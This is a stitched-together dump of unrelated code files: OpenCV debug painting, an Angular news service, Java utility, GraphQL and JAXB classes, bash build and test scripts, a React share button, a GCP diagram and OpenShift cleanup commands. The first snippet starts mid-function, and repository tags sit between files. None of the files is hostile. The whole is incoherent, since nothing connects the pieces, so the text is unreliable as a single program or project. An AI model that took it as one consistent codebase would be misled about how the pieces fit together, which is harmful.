matSubtitle, prevMatSubtitle // eslint-disable-next-line no-console console.log({ dialog: dialogMat.matSubtitle.countNonZero(), actor }); paintMat(mat, actor, rectInnerNameLabel, blue); paintMat(mat, dialogMat.matSubtitle, subtitleRect, red); paintMat(mat, dialogMat.fifthMatSubtitle, subtitleRectFifth, green, 100); if (dialogMat.prevMatSubtitle) { paintMat( mat, dialogMat.prevMatSubtitle, prevSubtitleRect, yellow, null, dialogMat.prevMatSubtitle.countNonZero() ); const nextBordered = subTractBorder(dialogMat.prevMatSubtitle); const sub = nextBordered.sub(dialogMat.matSubtitle); paintMat(mat, sub, diffSubtitleRect, blue, null, sub.countNonZero()); // const revSub = dialogMat.matSubtitle.sub(dialogMat.prevMatSubtitle); paintMat( mat, nextBordered, diffSubtitleRect2, purple, null, nextBordered.countNonZero() ); } return mat; } return mat; }
import { Injectable } from '@angular/core'; import { HttpClient } from '@angular/common/http'; import { environment } from '../../environments/environment'; import { IGetNewsAuthorsResponse, IGetNewsResponse } from '../core/news'; @Injectable({ providedIn: 'root' }) export class NewsService { //#region Lifecycle constructor(private http: HttpClient) { } //#endregion //#region Commands getNewsAuthors() { return this.http.get<IGetNewsAuthorsResponse>( `${environment.apiHost}/v1/news/authors` ); } async getNewsAuthorsAsync() { return this.getNewsAuthors().toPromise(); } getNews() { return this.http.get<IGetNewsResponse>( `${environment.apiHost}/v1/news` ); } async getNewsAsync() { return this.getNews().toPromise(); } //#endregion }
<filename>chest/base-utils/math/src/main/java/net/community/chest/math/functions/eval/PositionalArgumentPropertyAccessor.java<gh_stars>1-10 /* * */ package net.community.chest.math.functions.eval; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import net.community.chest.resources.PropertyAccessor; /** * <P>Copyright GPLv2</P> * * @author <NAME>. * @since May 27, 2009 3:30:39 PM */ public class PositionalArgumentPropertyAccessor extends ArrayList<Number> implements PropertyAccessor<String,Number> { /** * */ private static final long serialVersionUID = -8479003120539033189L; public PositionalArgumentPropertyAccessor () { super(); } public PositionalArgumentPropertyAccessor (Collection<? extends Number> c) { super(c); } public PositionalArgumentPropertyAccessor (int initialCapacity) { super(initialCapacity); } public PositionalArgumentPropertyAccessor (Number ... nums) { this(((null == nums) || (nums.length <= 0)) ? 10 : nums.length); if ((nums != null) && (nums.length > 0)) addAll(Arrays.asList(nums)); } /* * @see net.community.chest.resources.PropertyAccessor#getProperty(java.lang.Object) */ @Override public Number getProperty (String key) { if ((null == key) || (key.length() <= 0)) return null; final Integer nIndex=Integer.decode(key); return get(nIndex.intValue()); } }
<gh_stars>100-1000 import click from virl.api import VIRLServer, ViewerPlugin, NoPluginError from virl.cli.views import node_def_list_table from virl.helpers import get_cml_client @click.command() @click.option("--node", default=None) def ls(**kwargs): """ list all node definitions or the details of a specific node definition """ node = kwargs.get("node") server = VIRLServer() client = get_cml_client(server) pl = None # Regardless of the argument, we have to get all the node definitions # In the case of no arg, we print them all. # In the case of an arg, we have to go back and get details. defs = client.definitions.node_definitions() try: pl = ViewerPlugin(viewer="node_def") except NoPluginError: pass if node: for f in list(defs): if f["id"] == node: if pl: pl.visualize(node_defs=[f]) else: node_def_list_table([f]) break else: if pl: pl.visualize(node_defs=defs) else: node_def_list_table(defs)
def flatten(lst): #Empty list to add the flatten items flat_list = [] #Loop through the list items for item in lst: #If the item is a list, then call the flatten function recursively if type(item) is list: flat_list.extend(flatten(item)) # Else append the item to the list else: flat_list.append(item) #Return the list return flat_list # Sample nested_list = [[1,2,[3]],4] flat_list = flatten(nested_list) print (flat_list) # Output: [1, 2, 3, 4]
<gh_stars>10-100 /** * */ package jframe.core.plugin; /** * 一组plugin的集合 * <p> * <li>向plugin广播消息</li> * <li>管理一组plugin</li> * </p> * * @author dzh * @date Sep 13, 2013 1:29:18 AM * @since 1.0 */ public interface PluginSession { }
package org.prime.graphql.mutation; import com.coxautodev.graphql.tools.GraphQLMutationResolver; import graphql.GraphQLException; import graphql.schema.DataFetchingEnvironment; import org.prime.graphql.model.AuthData; import org.prime.graphql.model.User; import org.prime.graphql.repository.UserRepository; import org.prime.graphql.resolver.SigninPayload; import org.prime.graphql.security.jwt.JwtTokenUtil; import org.prime.graphql.security.jwt.JwtUserDetailsService; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.security.core.userdetails.UserDetails; import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; public class Mutation implements GraphQLMutationResolver{ // NOT AUTOWIRED HERE IT"S NOT WORKING private JwtTokenUtil jwtTokenUtil; private JwtUserDetailsService userDetailsService; private final UserRepository userRepository; private final Logger logger = LoggerFactory.getLogger(this.getClass()); public Mutation(UserRepository userRepository, JwtTokenUtil jwtTokenUtil, JwtUserDetailsService userDetailsService) { this.userRepository = userRepository; this.jwtTokenUtil = jwtTokenUtil; this.userDetailsService = userDetailsService; } public SigninPayload signinUser(AuthData auth, DataFetchingEnvironment env){ User user = userRepository.findByUsername(auth.getUsername()).get(); BCryptPasswordEncoder encoder = new BCryptPasswordEncoder(); if (encoder.matches(auth.getPassword(), user.getPassword())) { logger.info("match"); UserDetails userDetails = userDetailsService.loadUserByUsername(auth.getUsername()); logger.info("userdetails: {}", userDetails); Authentication authentication = new UsernamePasswordAuthenticationToken(auth.getUsername(), auth.getPassword(), userDetails.getAuthorities()); logger.info("authentication: {}", authentication); SecurityContextHolder.getContext().setAuthentication(authentication); //context.getRequest().get().getSession(true).setAttribute("SPRING_SECURITY_CONTEXT", SecurityContextHolder.getContext()); logger.info("context is ready"); return new SigninPayload(jwtTokenUtil.generateToken(user.getUsername()), user); } throw new GraphQLException("Invalid credentials"); } }
#!/usr/bin/env bash #SBATCH --job-name=bdd_source_and_HP18k_remap_cityscapes_hist #SBATCH -o gypsum/logs/%j_bdd_source_and_HP18k_remap_cityscapes_hist.txt #SBATCH -e gypsum/errs/%j_bdd_source_and_HP18k_remap_cityscapes_hist.txt #SBATCH -p 1080ti-long #SBATCH --gres=gpu:4 #SBATCH --mem=100000 ##SBATCH --cpus-per-task=4 ##SBATCH --mem-per-cpu=4096 export CUDA_VISIBLE_DEVICES=3 python tools/train_net_step.py \ --dataset bdd_peds+HP18k_remap_cityscape_hist \ --cfg configs/baselines/bdd_distill100.yaml \ --set NUM_GPUS 1 TRAIN.SNAPSHOT_ITERS 5000 \ --iter_size 2 \ --use_tfboard \ --load_ckpt /mnt/nfs/scratch1/pchakrabarty/bdd_recs/ped_models/bdd_peds.pth \
<reponame>siyingpoof/main package seedu.address.ui; import java.util.Optional; import org.junit.Rule; import guitests.GuiRobot; import guitests.guihandles.exceptions.NodeNotFoundException; import javafx.scene.Node; import seedu.address.ui.testutil.UiPartRule; /** * A GUI unit test class for DocX. */ public abstract class GuiUnitTest { @Rule public final UiPartRule uiPartRule = new UiPartRule(); protected final GuiRobot guiRobot = new GuiRobot(); /** * Retrieves the {@code query} node owned by the {@code rootNode}. * * @param query name of the CSS selector of the node to retrieve. * @throws NodeNotFoundException if no such node exists. */ protected <T extends Node> T getChildNode(Node rootNode, String query) { Optional<T> node = guiRobot.from(rootNode).lookup(query).tryQuery(); return node.orElseThrow(NodeNotFoundException::new); } }
function largestObject(arrayOfObjects) { let max = 0; let maxObj; for (let i = 0; i < arrayOfObjects.length; i++) { if (arrayOfObjects[i].count >= max) { max = arrayOfObjects[i].count; maxObj = arrayOfObjects[i]; } } return maxObj; }
import java.io.PrintStream; import java.util.List; public class ListCommand extends Command { private Library library; public ListCommand(String listKinds, PrintStream printStream, Library library) { super(listKinds, printStream); this.library = library; } @Override public void execute() { List<Book> booksToPrint; switch (getCommandParameter()) { case "all": booksToPrint = library.getAllBooks(); break; case "available": booksToPrint = library.getAvailableBooks(); break; case "checkedOut": booksToPrint = library.getCheckedOutBooks(); break; default: getPrintStream().println("Invalid listKinds parameter"); return; } for (Book book : booksToPrint) { getPrintStream().println(book.getTitle() + " - " + book.getAuthor()); } } }
#!/bin/sh python3 -m venv venv && venv/bin/pip install -U pip && venv/bin/pip install -r requirements-dev.txt
0=${(%):-%x} @echo "=== ${0:t:r} ===" autoload -Uz ${0:a:h}/functions/setup && setup source $PRJ_HOME/antidote.zsh repo="ohmyzsh/ohmyzsh" antidote path $repo &>/dev/null @test "'antidote path' fails when a bundle doesn't exist" $? -ne 0 expected="antidote: error: $repo does not exist in cloned paths" actual=$(antidote path $repo 2>&1) @test "'antidote path' fails with the expected message" "$expected" = "$actual" # mock so we don't actually clone a repo function _antidote_gitclone { _mock_gitclone "$@" } # we need to redirect fd3 to somewhere when we mock cloning # Also, we aren't testing 'antidote bundle' here - we already have tests for that. # For this, we just need it to mock-clone so we can test the path command 3>/dev/null antidote bundle $repo &>/dev/null @test "antidote bundle succeeded" $? -eq 0 antidote path $repo &>/dev/null @test "'antidote path' succeeds when a bundle exists" $? -eq 0 expected="$ANTIDOTE_HOME/https-COLON--SLASH--SLASH-github.com-SLASH-ohmyzsh-SLASH-ohmyzsh" actual=$(antidote path $repo 2>&1) @test "'antidote path' succeeds with the expected path output" "$expected" = "$actual" teardown
package com.artist.web.bookstore; import android.app.Application; import com.artist.web.bookstore.network.ApiManager; public class LaunchApplication extends Application { public static ApiManager sApiManager; @Override public void onCreate() { super.onCreate(); sApiManager = ApiManager.getInstance(); } }
#!/bin/bash curdir=$pwd mydir="${0%/*}" cd $mydir # TODO: add progress bar, -q is quite, if removing it the progress bar is in # multiple lines echo "downloading boost" wget -q https://dl.bintray.com/boostorg/release/1.68.0/source/boost_1_68_0.tar.gz echo "unzipping boost" tar xzvf boost_1_68_0.tar.gz >> /dev/null echo "installing boost" cd boost_1_68_0; mkdir installed ./bootstrap.sh --prefix=`pwd`/installed --with-libraries=program_options >> /dev/null ; ./b2 cxxflags=-fPIC link=static install >> /dev/null mkdir installed32 ./bootstrap.sh --prefix=`pwd`/installed32 --with-libraries=program_options >> /dev/null ; ./b2 cxxflags=-fPIC link=static install address-model=32 >> /dev/null cd $curdir
#!/bin/bash device=2,3 batch_size=256 noise_type=dropout data=cifar10 n_ensemble=1 for levels in 1 2 3 4 5 do for sigma in 0.5 do test_sigma=0.0 echo "nonadv testing" "sigma =" ${sigma} "test_sigma =" ${test_sigma} echo "level = " ${levels} ckpt_f=./ckpt/sde_${data}_${sigma}_${noise_type}.pth CUDA_VISIBLE_DEVICES=${device} python nonadv_evaluation.py \ --data $data \ --batch_size $batch_size \ --levels $levels \ --ckpt $ckpt_f \ --sigma $sigma \ --test_sigma $test_sigma \ --noise_type $noise_type \ --n_ensemble $n_ensemble \ > >(tee ./results/nonadv_acc/nonadv_acc_sde_${data}_train\=${sigma}_test\=${sigma}_${noise_type}.txt) #device=$((device+1)) done done
<gh_stars>1-10 package org.nikkii.alertify4j.util; import java.util.NoSuchElementException; /* * Copyright (c) 2012, 2013, Oracle and/or its affiliates. All rights reserved. * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. */ /** * A container object which may or may not contain a non-null value. If a value is present, {@code isPresent()} will * return {@code true} and {@code get()} will return the value. */ public final class Optional<T> { /** * Common instance for {@code empty()}. */ private static final Optional<?> EMPTY = new Optional<Object>(); /** * Returns an empty optional instance. No value is present for this Optional. * @param <T> Type of the non-existent value * @return An empty optional. */ @SuppressWarnings("unchecked") public static <T> Optional<T> empty() { return (Optional<T>) EMPTY; } /** * Returns an optional with the specified present non-null value. * @param value The value to be present, which must be non-null. * @return An optional with the value present. * @throws NullPointerException If value is null. */ public static <T> Optional<T> of(T value) { return new Optional<T>(value); } /** * Returns an optional describing the specified value, if non-null, otherwise returns an empty optional. * @param value The possibly-null value to describe. * @return An optional with a present value if the specified value is non-null, otherwise an empty optional. */ @SuppressWarnings("unchecked") public static <T> Optional<T> ofNullable(T value) { return (Optional<T>) (value == null ? empty() : of(value)); } /** * If non-null, the value; if null, indicates no value is present */ private final T value; /** * Creates a new empty optional. */ private Optional() { this.value = null; } /** * Creates the optional with the specified non-null value. * @param value The non-null value. * @throws NullPointerException If the value is null. */ private Optional(T value) { if (value == null) { throw new IllegalArgumentException("Value cannot be null."); } this.value = value; } @Override public boolean equals(Object obj) { if (this == obj) { return true; } if (!(obj instanceof Optional)) { return false; } Optional<?> other = (Optional<?>) obj; if (value == null && other.value == null) { return true; } return value != null && value.equals(other.value); } /** * Returns the value of this optional. * @return The non-null value held by this optional. * @throws NoSuchElementException If there is no value present. */ public T get() { if (value == null) { throw new NoSuchElementException("No value present."); } return value; } @Override public int hashCode() { return value == null ? 0 : value.hashCode(); } /** * Return {@code true} if there is a value present, otherwise {@code false}. * @return {@code true} if there is a value present, otherwise {@code false} */ public boolean isPresent() { return value != null; } /** * Return the value if present, otherwise return {@code other}. * @param other the value to be returned if there is no value present, may be null * @return the value, if present, otherwise {@code other} */ public T orElse(T other) { return value != null ? value : other; } @Override public String toString() { return value != null ? "Optional: value=" + value + "." : "Optional.empty"; } }
package com.foxconn.iot.core.repository; import org.springframework.data.domain.Page; import org.springframework.data.domain.Pageable; import org.springframework.data.jpa.repository.JpaRepository; import org.springframework.data.jpa.repository.Modifying; import org.springframework.data.jpa.repository.Query; import org.springframework.data.repository.query.Param; import com.foxconn.iot.core.entity.ClientVersion; public interface ClientVersionRepository extends JpaRepository<ClientVersion, Long> { ClientVersion findById(long id); @Modifying @Query(value = "update ClientVersion a set a.status=:status where a.id=:id") void updateStatusById(@Param("status") int status, @Param("id") long id); @Modifying @Query(value = "update ClientVersion a set a.publish=:publish where a.id=:id") void updatePublishById(@Param("publish") int publish, @Param("id") long id); @Query(value="select a from ClientVersion a where a.client.id=:clientId") Page<ClientVersion> queryByClientId(@Param("clientId") long clientId, Pageable pageable); }
import pprint def process_peers(omp_peers: list, json: bool) -> None: if json: pp = pprint.PrettyPrinter(indent=2) pp.pprint(omp_peers) else: for peer in omp_peers: # Perform a specific action for each peer when json is False # Example: print(peer) or perform any other required action print(peer) # Placeholder action, replace with the actual action
package com.objectway.stage.converter; import java.util.ArrayList; import java.util.List; import com.objectway.stage.model.AccountServiceBean; import com.objectway.stage.model.TransactionServiceBean; import com.objectway.stage.viewbeans.AccountViewBean; import com.objectway.stage.viewbeans.TransactionViewBean; public class TransactionViewConverter implements ServiceViewConverter<TransactionServiceBean, TransactionViewBean>{ private static final ServiceViewConverter<AccountServiceBean, AccountViewBean> contoCorrenteViewConverter = new AccountViewConverter(); @Override public TransactionServiceBean viewToService(TransactionViewBean tv) { TransactionServiceBean ts = new TransactionServiceBean(); ts.setAmount(tv.getAmount()); ts.setDeposit(tv.isDeposit()); ts.setDateIns(tv.getDateIns()); ts.setAccount(contoCorrenteViewConverter.viewToService(tv.getAccount())); return ts; } @Override public TransactionViewBean serviceToView(TransactionServiceBean ts) { TransactionViewBean tv = new TransactionViewBean(); tv.setAmount(ts.getAmount()); tv.setDeposit(ts.isDeposit()); tv.setDateIns(ts.getDateIns()); tv.setAccount(contoCorrenteViewConverter.serviceToView(ts.getAccount())); return tv; } @Override public List<TransactionServiceBean> viewListToServiceList(List<TransactionViewBean> tvl) { List<TransactionServiceBean> tsl = new ArrayList<>(); tvl.forEach(tv -> tsl.add(viewToService(tv))); return tsl; } @Override public List<TransactionViewBean> serviceListToViewList(List<TransactionServiceBean> tsl) { List<TransactionViewBean> tvl = new ArrayList<>(); tsl.forEach(ts -> tvl.add(serviceToView(ts))); return tvl; } }
#!/bin/bash ############################################################### # -p <producing nodes count> # -n <total nodes> # -s <topology> # -d <delay between nodes startup> ############################################################### pnodes=10 topo=star delay=0 args=`getopt p:n:s:d: $*` if [ $? == 0 ]; then set -- $args for i; do case "$i" in -p) pnodes=$2; shift; shift;; -n) total_nodes=$2; shift; shift;; -d) delay=$2; shift; shift;; -s) topo="$2"; shift; shift;; --) shift; break;; esac done else echo "huh we got err $?" if [ -n "$1" ]; then pnodes=$1 if [ -n "$2" ]; then topo=$2 if [ -n "$3" ]; then total_nodes=$3 fi fi fi fi total_nodes="${total_nodes:-`echo $pnodes`}" rm -rf tn_data_* if [ "$delay" == 0 ]; then programs/launcher/launcher -p $pnodes -n $total_nodes -s $topo else programs/launcher/launcher -p $pnodes -n $total_nodes -s $topo -d $delay fi sleep 7 echo "start" > test.out port=8888 endport=`expr $port + $total_nodes` echo endport = $endport while [ $port -ne $endport ]; do programs/eosc/eosc --port $port get block 1 >> test.out 2>&1; port=`expr $port + 1` done grep 'producer"' test.out | tee summary | sort -u -k2 | tee unique prodsfound=`wc -l < unique` lines=`wc -l < summary` if [ $lines -eq $total_nodes -a $prodsfound -eq 1 ]; then echo all synced programs/launcher/launcher -k 15 exit fi echo $lines reports out of $total_nodes and prods = $prodsfound sleep 18 programs/eosc/eosc --port 8888 get block 5 sleep 15 programs/eosc/eosc --port 8888 get block 10 sleep 15 programs/eosc/eosc --port 8888 get block 15 sleep 15 programs/eosc/eosc --port 8888 get block 20 sleep 15 echo "pass 2" > test.out port=8888 while [ $port -ne $endport ]; do programs/eosc/eosc --port $port get block 1 >> test.out 2>&1; port=`expr $port + 1` done grep 'producer"' test.out | tee summary | sort -u -k2 | tee unique prodsfound=`wc -l < unique` lines=`wc -l < summary` if [ $lines -eq $total_nodes -a $prodsfound -eq 1 ]; then echo all synced programs/launcher/launcher -k 15 exit fi echo ERROR: $lines reports out of $total_nodes and prods = $prodsfound programs/launcher/launcher -k 15 echo ================================================================= echo Contents of tn_data_00/config.ini: cat tn_data_00/config.ini echo ================================================================= echo Contents of tn_data_00/stderr.txt: cat tn_data_00/stderr.txt exit 1
import React from 'react'; import PropTypes from 'prop-types'; import Share from 'react-native-share'; import TouchableOpacity from '~/components/TouchableOpacity' import Icon from 'react-native-vector-icons/FontAwesome'; import { scale, colors } from '~/configs/styles'; class ShareButton extends React.PureComponent { static displayName = "@ShareButton"; static propTypes = { title: PropTypes.string, description: PropTypes.string, link: PropTypes.string.isRequired, emailCC: PropTypes.oneOfType([ PropTypes.array, PropTypes.string ]), emailBody: PropTypes.string, emailSubject: PropTypes.string }; render() { const { title, description: message, link: url, emailCC, emailBody, emailSubject: subject, iconStyle, onPress, ...otherProps } = this.props; return ( <TouchableOpacity {...otherProps} onPress={(e) => { onPress && onPress(e); Share.open({ url, message, title, subject, failOnCancel: true }); }} > <Icon name = 'share-alt' style = {iconStyle || _styles.icon} /> </TouchableOpacity> ); } } const _styles = { icon: { fontSize: scale(20), color: colors.text.normal } }; export default ShareButton;
<reponame>carlosjhr64/mdserver<filename>plug/restart.rb module Markita class Base get '/restart.html' do Thread.new do sleep 1 Kernel.exec($0, *ARGV) end <<~RESTART <!DOCTYPE html> <html> <head><title>restart</title></head> <body> <h1>MDServer restart</h1> <pre>#{$0} #{ARGV.join(' ')}</pre> </body> </html> RESTART end end end
from picturate.config import CAttnGANConfig from picturate.nets import CAttnGAN config = CAttnGANConfig('bird') gan = CAttnGAN(config, pretrained=True) caption = "This little bird is blue with short beak and white underbelly" filename = 'bird' gan.generate_image(caption, filename)
import Article from './article' import Audio from './audio' import Book from './book' import Code from './code' import Event from './event' import Instagram from './instagram' import JS from './js' import ReactIcon from './react' import Tech from './tech' import Video from './video' export { Article, Audio, Book, Code, Event, Instagram, JS, ReactIcon, Tech, Video }
public static int findFirstNumberPos(String s) { int pos = -1; for (int i = 0; i < s.length(); i++) { if (Character.isDigit(s.charAt(i))) { pos = i; break; } } return pos; }
package org.opentele.server.dgks.monitoringdataset.version1_0_1.generated; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlElement; import javax.xml.bind.annotation.XmlSchemaType; import javax.xml.bind.annotation.XmlType; import javax.xml.datatype.XMLGregorianCalendar; /** * <p>Java class for DrugEffectuationType complex type. * * <p>The following schema fragment specifies the expected content contained within this class. * * <pre> * &lt;complexType name="DrugEffectuationType"> * &lt;complexContent> * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}anyType"> * &lt;sequence> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}EffectuationIdentifier"/> * &lt;element name="CreatedDateTime" type="{http://www.w3.org/2001/XMLSchema}dateTime"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugName"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugFormText"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugStrengthText"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2009/01/01}DosageFreeText"/> * &lt;element name="AccordingToNeed" type="{http://www.w3.org/2001/XMLSchema}boolean" minOccurs="0"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2009/01/01}IndicationFreeText" minOccurs="0"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}ATCCode"/> * &lt;element name="CreatedBy" type="{http://www.w3.org/2001/XMLSchema}string"/> * &lt;/sequence> * &lt;/restriction> * &lt;/complexContent> * &lt;/complexType> * </pre> * * */ @XmlAccessorType(XmlAccessType.FIELD) @XmlType(name = "DrugEffectuationType", propOrder = { "effectuationIdentifier", "createdDateTime", "drugName", "drugFormText", "drugStrengthText", "dosageFreeText", "accordingToNeed", "indicationFreeText", "atcCode", "createdBy" }) public class DrugEffectuationType { @XmlElement(name = "EffectuationIdentifier", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01") protected long effectuationIdentifier; @XmlElement(name = "CreatedDateTime", required = true) @XmlSchemaType(name = "dateTime") protected XMLGregorianCalendar createdDateTime; @XmlElement(name = "DrugName", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugName; @XmlElement(name = "DrugFormText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugFormText; @XmlElement(name = "DrugStrengthText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugStrengthText; @XmlElement(name = "DosageFreeText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2009/01/01", required = true) protected String dosageFreeText; @XmlElement(name = "AccordingToNeed") protected Boolean accordingToNeed; @XmlElement(name = "IndicationFreeText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2009/01/01") protected String indicationFreeText; @XmlElement(name = "ATCCode", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String atcCode; @XmlElement(name = "CreatedBy", required = true) protected String createdBy; /** * Gets the value of the effectuationIdentifier property. * */ public long getEffectuationIdentifier() { return effectuationIdentifier; } /** * Sets the value of the effectuationIdentifier property. * */ public void setEffectuationIdentifier(long value) { this.effectuationIdentifier = value; } /** * Gets the value of the createdDateTime property. * * @return * possible object is * {@link XMLGregorianCalendar } * */ public XMLGregorianCalendar getCreatedDateTime() { return createdDateTime; } /** * Sets the value of the createdDateTime property. * * @param value * allowed object is * {@link XMLGregorianCalendar } * */ public void setCreatedDateTime(XMLGregorianCalendar value) { this.createdDateTime = value; } /** * Gets the value of the drugName property. * * @return * possible object is * {@link String } * */ public String getDrugName() { return drugName; } /** * Sets the value of the drugName property. * * @param value * allowed object is * {@link String } * */ public void setDrugName(String value) { this.drugName = value; } /** * Gets the value of the drugFormText property. * * @return * possible object is * {@link String } * */ public String getDrugFormText() { return drugFormText; } /** * Sets the value of the drugFormText property. * * @param value * allowed object is * {@link String } * */ public void setDrugFormText(String value) { this.drugFormText = value; } /** * Gets the value of the drugStrengthText property. * * @return * possible object is * {@link String } * */ public String getDrugStrengthText() { return drugStrengthText; } /** * Sets the value of the drugStrengthText property. * * @param value * allowed object is * {@link String } * */ public void setDrugStrengthText(String value) { this.drugStrengthText = value; } /** * Gets the value of the dosageFreeText property. * * @return * possible object is * {@link String } * */ public String getDosageFreeText() { return dosageFreeText; } /** * Sets the value of the dosageFreeText property. * * @param value * allowed object is * {@link String } * */ public void setDosageFreeText(String value) { this.dosageFreeText = value; } /** * Gets the value of the accordingToNeed property. * * @return * possible object is * {@link Boolean } * */ public Boolean isAccordingToNeed() { return accordingToNeed; } /** * Sets the value of the accordingToNeed property. * * @param value * allowed object is * {@link Boolean } * */ public void setAccordingToNeed(Boolean value) { this.accordingToNeed = value; } /** * Gets the value of the indicationFreeText property. * * @return * possible object is * {@link String } * */ public String getIndicationFreeText() { return indicationFreeText; } /** * Sets the value of the indicationFreeText property. * * @param value * allowed object is * {@link String } * */ public void setIndicationFreeText(String value) { this.indicationFreeText = value; } /** * Gets the value of the atcCode property. * * @return * possible object is * {@link String } * */ public String getATCCode() { return atcCode; } /** * Sets the value of the atcCode property. * * @param value * allowed object is * {@link String } * */ public void setATCCode(String value) { this.atcCode = value; } /** * Gets the value of the createdBy property. * * @return * possible object is * {@link String } * */ public String getCreatedBy() { return createdBy; } /** * Sets the value of the createdBy property. * * @param value * allowed object is * {@link String } * */ public void setCreatedBy(String value) { this.createdBy = value; } }
/* * Copyright (C) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.android.example.wordlistsql; import android.content.Context; import android.content.Intent; import android.support.v7.widget.RecyclerView; import android.util.Log; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.Button; import android.widget.CheckBox; import android.widget.CompoundButton; import android.widget.TextView; import android.widget.Toast; import java.util.ArrayList; import java.util.List; /** * Implements a simple Adapter for a RecyclerView. * Demonstrates how to add a click handler for each item in the ViewHolder. */ public class WordListAdapter extends RecyclerView.Adapter<WordListAdapter.WordViewHolder> { WordListOpenHelper mDB; /** * Custom view holder with a text view and two buttons. */ class WordViewHolder extends RecyclerView.ViewHolder { public final TextView wordItemView; public final TextView fechaItemView; public final TextView horaItemView; public final CheckBox checkBoxItemView; public final TextView completadoItemView; public WordViewHolder(View itemView) { super(itemView); wordItemView = (TextView) itemView.findViewById(R.id.tareamostrada); fechaItemView = (TextView) itemView.findViewById(R.id.fechamostrada); horaItemView = (TextView) itemView.findViewById(R.id.horamostrada); checkBoxItemView = (CheckBox) itemView.findViewById(R.id.tareaterminada); completadoItemView= (TextView) itemView.findViewById(R.id.completado); } } private static final String TAG = WordListAdapter.class.getSimpleName(); public static final String EXTRA_ID = "ID"; public static final String EXTRA_WORD = "WORD"; private final LayoutInflater mInflater; Context mContext; public WordListAdapter(Context context, WordListOpenHelper db ) { mInflater = LayoutInflater.from(context); mContext = context; mDB = db; } @Override public WordViewHolder onCreateViewHolder(ViewGroup parent, int viewType) { View itemView = mInflater.inflate(R.layout.wordlist_item, parent, false); return new WordViewHolder(itemView); } @Override public void onBindViewHolder(WordViewHolder holder, int position) { WordItem current = mDB.query(position); holder.wordItemView.setText(current.getWord()); holder.fechaItemView.setText(current.getDay()); holder.horaItemView.setText(current.getHour()); // Keep a reference to the view holder for the click listener final WordViewHolder h = holder; // needs to be final for use in callback // Attach a click listener to the DELETE button. holder.checkBoxItemView.setOnCheckedChangeListener(new MyButtonOnClickListener (current.getId(),null) { @Override public void onCheckedChanged(CompoundButton buttonView, boolean isChecked) { if(isChecked){ Toast.makeText( buttonView.getContext(), "Check super works!!", Toast.LENGTH_SHORT).show(); Intent i = new Intent(buttonView.getContext(), completedTasks.class); mContext.startActivity(i); h.checkBoxItemView.setChecked(false); } } }); /** holder.delete_button.setOnClickListener( new MyButtonOnClickListener(current.getId(),null){ @Override public void onClick(View v ) { int deleted = mDB.delete(id); if (deleted >= 0) notifyItemRemoved(h.getAdapterPosition()); } }); */ } @Override public int getItemCount() { // Placeholder so we can see some mock data. return (int) mDB.count(); } }
#!/usr/bin/env bash docker build -t claudiofahey/nvidiagpubeat:20180925 .
import React from 'react'; import { PNG, Diagram, GeneralIcon } from 'rediagram'; import { GCP, CloudLoadBalancing, InvizGCP, CloudDNS, ComputeEngine, Zone, CloudStorage, CloudSQL, } from '@rediagram/gcp'; PNG( <Diagram title="Content Management"> <InvizGCP> <GeneralIcon name="iOS/Android/Web" type="Mobile client" upstream={['DNS', 'Load Balancer']} /> <GeneralIcon name="Publisher" type="Client" upstream={['Content Server2']} /> <GCP> <CloudDNS name="DNS" /> <CloudLoadBalancing name="Load Balancer" upstream={['Content Server1', 'Content Server2']} /> <Zone title="Zone A"> <ComputeEngine name="Content Server1" description="Auto Scaling" upstream={['Static Content', 'Dynamic Content']} /> </Zone> <Zone title="Zone B"> <ComputeEngine name="Content Server2" description="Auto Scaling" upstream={['Static Content', 'Dynamic Content']} /> </Zone> <CloudStorage name="Static Content" /> <CloudSQL name="Dynamic Content" /> </GCP> </InvizGCP> </Diagram>, );
#!/bin/bash . $(dirname ${BASH_SOURCE})/../../util.sh rm -fr $(relative project/api-router) oc delete dc api-router-app --namespace=demos oc delete bc api-router-app --namespace=demos oc delete svc api-router-app --namespace=demos oc delete svc api-router --namespace=demos oc delete is api-router-app --namespace=demos oc delete template api-router-app --namespace=demos oc delete build $(oc get builds | grep -i complete | grep api-router-app | awk '{print $1}') oc delete pod $(oc get pod | grep Completed | awk '{print $1}') oc delete route api-router oc delete is fis-java-openshift --namespace=demos oc delete is fis-karaf-openshift --namespace=demos docker rmi -f $(docker images | grep api-router-app | awk '{print $3}')
#!/bin/bash python app.py ./config.json ./issuance_request_config.json ./presentation_request_config.json
